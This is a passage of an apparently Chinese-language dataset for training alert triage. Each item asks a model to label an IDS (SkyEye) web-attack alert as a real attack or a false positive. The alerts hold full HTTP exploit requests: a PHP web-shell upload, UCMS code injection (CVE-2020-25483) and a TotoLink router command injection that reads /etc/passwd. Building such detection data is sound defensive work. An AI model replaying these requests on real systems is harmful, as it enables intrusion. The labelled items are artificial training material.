"UE9TVCAvVXBsb2FkL3VwbG9hZF9maWxlLnBocD9sPXFtemFuIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDE5Nw0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9LS0tLXdzcmVxbmdnY29qdWR0c2Jka2dmDQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "LS0tLS0td3NyZXFuZ2djb2p1ZHRzYmRrZ2YKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9InJvd2RmcXZmbHUucGhwIgpDb250ZW50LVR5cGU6IGltYWdlL2F2aWYKCjw/cGhwIGVjaG8gbWQ1KDEwODE1Nzc2KTt1bmxpbmsoX19GSUxFX18pOz8+Ci0tLS0tLXdzcmVxbmdnY29qdWR0c2Jka2dmLS0=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_373fdd2dbfad8595d3471a7e80731496", "access_time": "2024-11-27 14:16:05", "content-length": "197", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16110000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "multipart/form-data; boundary=----wsreqnggcojudtsbdkgf", "sip": "223.160.174.104", "dimension": "3", "url_path": "/Upload/upload_file.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "upload_file.php", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /Upload/upload_file.php?l=qmzan HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 197\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: multipart/form-data; boundary=----wsreqnggcojudtsbdkgf\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "------wsreqnggcojudtsbdkgf\nContent-Disposition: form-data; name=\"file\"; filename=\"rowdfqvflu.php\"\nContent-Type: image/avif\n\n<?php echo md5(10815776);unlink(__FILE__);?>\n------wsreqnggcojudtsbdkgf--", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567902-发现脚本文件上传行为", "rule_labels": "{\"0x110101\": {\"parent_id\": \"0x110100\", \"type\": \"攻击阶段\", \"name\": \"后门上传\", \"parent_name\": \"后门上传利用\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12150", "h_url": "/Upload/upload_file.php?l=qmzan"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688164", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688164, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 37, "uri": "/ucms/index.php?do=sadmin_fileedit&dir=/ucms/&file=qivfrb.php", "dport": 30001, "vuln_name": "PHP代码执行攻击", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 17, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "223.160.174.104", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2018-09-13 16:03:57", "sport": 12139}, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "api": "218.76.15.56:30001/ucms/index.php", "first_access_time": "2024-11-27 14:16:04", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "fdac32a0203c499d7bfde4b715c2e014", "xff": "", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02010000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688144", "code_language": "PHP", "file": "qivfrb.php", "pos": "17", "public_date": "2018-09-13 16:03:57", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "37", "h_proto_version": "HTTP/1.1", "co": "%3C%3fphp+echo+md5(42293)%3b%3f%3E", "uri": "/ucms/index.php?do=sadmin_fileedit&dir=/ucms/&file=qivfrb.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020593", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "PHP代码执行攻击", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "do": "sadmin_fileedit", "dir": "/ucms/", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "17", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvdWNtcy9pbmRleC5waHA/ZG89c2FkbWluX2ZpbGVlZGl0JmRpcj0vdWNtcy8mZmlsZT1xaXZmcmIucGhwIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDU1DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQoNCg==", "req_body": "dXV1X3Rva2VuPSZjbz0lM0MlM2ZwaHArZWNobyttZDUoNDIyOTMpJTNiJTNmJTNFJnBvcz0xNw==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_5d152be37629b6d53e594b7a1e6a875b", "access_time": "2024-11-27 14:16:04", "content-length": "55", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/ucms/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /ucms/index.php?do=sadmin_fileedit&dir=/ucms/&file=qivfrb.php HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 55\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\n\r\n", "req_body": "uuu_token=&co=%3C%3fphp+echo+md5(42293)%3b%3f%3E&pos=17", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567955-PHP代码执行攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12139", "h_url": "/ucms/index.php?do=sadmin_fileedit&dir=/ucms/&file=qivfrb.php"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688164", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688164, "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 0, "uri": "/ucms/index.php?do=sadmin_fileedit&dir=/ucms/&file=qivfrb.php", "dport": 30001, "vuln_name": "PHP代码执行攻击(机器学习)", "rsp_status": 0, "code_language": "PHP", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 0, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "xff": "", "sip": "223.160.174.104", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "public_date": "2020-11-25 19:53:49", "sport": 12139}, "detail_info": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "api": "218.76.15.56:30001/ucms/index.php", "first_access_time": "2024-11-27 14:16:04", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "PHP代码执行攻击(机器学习)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "eb65960f241bb83d95058d48e2765e2b", "xff": "", "vuln_desc": "PHP代码执行攻击(机器学习)\t\r\n远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在phpWeb中,通常通过php中可以执行代码的函数,如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec()等来执行代码", "attack_chain": "0x02020000", "vuln_harm": "攻击者可以通过PHP代码执行获取应用服务器信息,甚至获取服务器权限。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688144", "code_language": "PHP", "file": "qivfrb.php", "pos": "17", "public_date": "2020-11-25 19:53:49", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "co": "%3C%3fphp+echo+md5(42293)%3b%3f%3E", "uri": "/ucms/index.php?do=sadmin_fileedit&dir=/ucms/&file=qivfrb.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b70", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "PHP代码执行攻击(机器学习)", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "do": "sadmin_fileedit", "dir": "/ucms/", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用,对用户可控参数要做严格控制。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvdWNtcy9pbmRleC5waHA/ZG89c2FkbWluX2ZpbGVlZGl0JmRpcj0vdWNtcy8mZmlsZT1xaXZmcmIucGhwIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDU1DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQoNCg==", "req_body": "dXV1X3Rva2VuPSZjbz0lM0MlM2ZwaHArZWNobyttZDUoNDIyOTMpJTNiJTNmJTNFJnBvcz0xNw==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_dcb4ab9b6fec09266454c80e449d00ee", "access_time": "2024-11-27 14:16:04", "content-length": "55", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/ucms/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /ucms/index.php?do=sadmin_fileedit&dir=/ucms/&file=qivfrb.php HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 55\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\n\r\n", "req_body": "uuu_token=&co=%3C%3fphp+echo+md5(42293)%3b%3f%3E&pos=17", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569456-PHP代码执行攻击(机器学习)", "rule_labels": "{}", "sport": "12139", "h_url": "/ucms/index.php?do=sadmin_fileedit&dir=/ucms/&file=qivfrb.php"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688164", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732688164, "vuln_harm": "TotoLink A3002RU-V2.0.0 B20190814.1034 存在命令注入漏洞,该漏洞允许通过身份验证的远程用户修改系统的“运行命令”。攻击者可利用该漏洞可以使用此功能在路由器上执行任意OS命令。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 9, "uri": "/boafrm/formSysCmd", "dport": 30001, "vuln_name": "TotoLink A3002RU 命令执行漏洞(CVE-2020-25499)", "rsp_status": 0, "code_language": "", "solution": "官方补丁\r\nhttps://www.totolink.net/home/index/newsss/id/196.html", "hit_start": 0, "detail_info": "TotoLink A3002RU是中国台湾吉翁电子(TotoLink)公司的一款无线路由器产品。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "TotoLink A3002RU是中国台湾吉翁电子(TotoLink)公司的一款无线路由器产品。", "public_date": "2024-07-05 15:35:12", "sport": 12141}, "detail_info": "TotoLink A3002RU是中国台湾吉翁电子(TotoLink)公司的一款无线路由器产品。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/boafrm/formSysCmd", "submit-url": "%2Fsyscmd.htm", "first_access_time": "2024-11-27 14:16:04", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "TotoLink A3002RU 命令执行漏洞(CVE-2020-25499)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "d385141229c2be172589ec1b53076a34", "xff": "", "vuln_desc": "TotoLink A3002RU是中国台湾吉翁电子(TotoLink)公司的一款无线路由器产品。", "attack_chain": "0x02020000", "vuln_harm": "TotoLink A3002RU-V2.0.0 B20190814.1034 存在命令注入漏洞,该漏洞允许通过身份验证的远程用户修改系统的“运行命令”。攻击者可利用该漏洞可以使用此功能在路由器上执行任意OS命令。", "dport": "30001", "alert_devip": "172.31.191.57", "syscmd": "cat+%2Fetc%2Fpasswd", "update_time": "1732688144", "code_language": "", "public_date": "2024-07-05 15:35:12", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "9", "h_proto_version": "HTTP/1.1", "uri": "/boafrm/formSysCmd", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021c31", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "TotoLink A3002RU 命令执行漏洞(CVE-2020-25499)", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "官方补丁\r\nhttps://www.totolink.net/home/index/newsss/id/196.html", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvYm9hZnJtL2Zvcm1TeXNDbWQgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpDb250ZW50LUxlbmd0aDogNjgNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "c3lzQ21kPWNhdCslMkZldGMlMkZwYXNzd2QmYXBwbHk9QXBwbHkmc3VibWl0LXVybD0lMkZzeXNjbWQuaHRtJm1zZz0=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_a4dac0e57b933864eb3a9e522ae15602", "access_time": "2024-11-27 14:16:04", "content-length": "68", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/boafrm/formSysCmd", "src_mac": "00:94:a1:5e:6e:87", "apply": "Apply", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /boafrm/formSysCmd HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 68\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "sysCmd=cat+%2Fetc%2Fpasswd&apply=Apply&submit-url=%2Fsyscmd.htm&msg=", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268573745-TotoLink A3002RU 命令执行漏洞(CVE-2020-25499)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12141", "h_url": "/boafrm/formSysCmd"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688164", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件上传", "_origin": {"write_date": 1732688164, "vuln_harm": "攻击者利用该漏洞可以创建包含恶意代码的PHP文件,最终导致任意代码执行", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 18, "uri": "/ucms/index.php?do=sadmin_fileedit&dir=/ucms/&file=qivfrb.php", "dport": 30001, "vuln_name": "UCMS 文件上传漏洞(CVE-2020-25483)", "rsp_status": 0, "code_language": "", "solution": "升级至漏洞修复版本。", "hit_start": 0, "detail_info": "UCMS v1.4.8版本存在安全漏洞,该漏洞允许攻击者创建包含恶意代码的PHP文件,最终导致任意代码执行。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "UCMS v1.4.8版本存在安全漏洞,该漏洞允许攻击者创建包含恶意代码的PHP文件,最终导致任意代码执行。", "public_date": "2023-08-11 15:46:12", "sport": 12139}, "detail_info": "UCMS v1.4.8版本存在安全漏洞,该漏洞允许攻击者创建包含恶意代码的PHP文件,最终导致任意代码执行。", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "api": "218.76.15.56:30001/ucms/{filename}", "first_access_time": "2024-11-27 14:16:04", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "UCMS 文件上传漏洞(CVE-2020-25483)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "95a660334259856e1e10fdc26892bd7c", "xff": "", "vuln_desc": "UCMS v1.4.8版本存在安全漏洞,该漏洞允许攻击者创建包含恶意代码的PHP文件,最终导致任意代码执行。", "attack_chain": "0x02020000", "vuln_harm": "攻击者利用该漏洞可以创建包含恶意代码的PHP文件,最终导致任意代码执行", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688144", "code_language": "", "file": "qivfrb.php", "pos": "17", "public_date": "2023-08-11 15:46:12", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "18", "h_proto_version": "HTTP/1.1", "co": "%3C%3fphp+echo+md5(42293)%3b%3f%3E", "uri": "/ucms/index.php?do=sadmin_fileedit&dir=/ucms/&file=qivfrb.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021794", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "UCMS 文件上传漏洞(CVE-2020-25483)", "attack_type": "文件上传", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "do": "sadmin_fileedit", "dir": "/ucms/", "skyeye_type": "webids-webattack_dolog", "solution": "升级至漏洞修复版本。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvdWNtcy9pbmRleC5waHA/ZG89c2FkbWluX2ZpbGVlZGl0JmRpcj0vdWNtcy8mZmlsZT1xaXZmcmIucGhwIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDU1DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQoNCg==", "req_body": "dXV1X3Rva2VuPSZjbz0lM0MlM2ZwaHArZWNobyttZDUoNDIyOTMpJTNiJTNmJTNFJnBvcz0xNw==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_255759dffcdfb5edef4746ce216af175", "access_time": "2024-11-27 14:16:04", "content-length": "55", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16110000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/ucms/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", 